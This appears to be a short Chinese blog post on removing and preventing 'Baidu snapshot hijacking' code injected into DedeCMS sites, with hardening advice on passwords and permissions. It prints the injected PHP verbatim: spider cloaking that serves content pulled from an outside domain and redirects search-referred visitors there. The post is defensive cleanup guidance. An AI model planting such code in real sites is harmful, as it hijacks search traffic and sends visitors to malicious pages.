织梦百度快照劫持注入代码防范

訫病怎嚒医 技术杂谈评论12阅读模式

if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if (strpos($fromurl,$v)!==false) { $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?>

单这段代码就直接把搜索引擎蜘蛛搞晕,带到别的恶意网址去。

把其删掉,如果在index.php里没找到,但还是存在类似的问题,可以用dw全站搜索下。

关于防范,空间,ftp账号,权限,后台账号之类都需要设置下,不能太过简单,可以看相关教程《织梦cms的安全设置专题

 

 
訫病怎嚒医
  • 本文由 訫病怎嚒医 发表于 2024年 3月 14日 21:16:40
  • 转载请务必保留本文链接:https://blog.chunchunhd.com/1958.html
匿名

发表评论

匿名网友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:
确定

拖动滑块以完成验证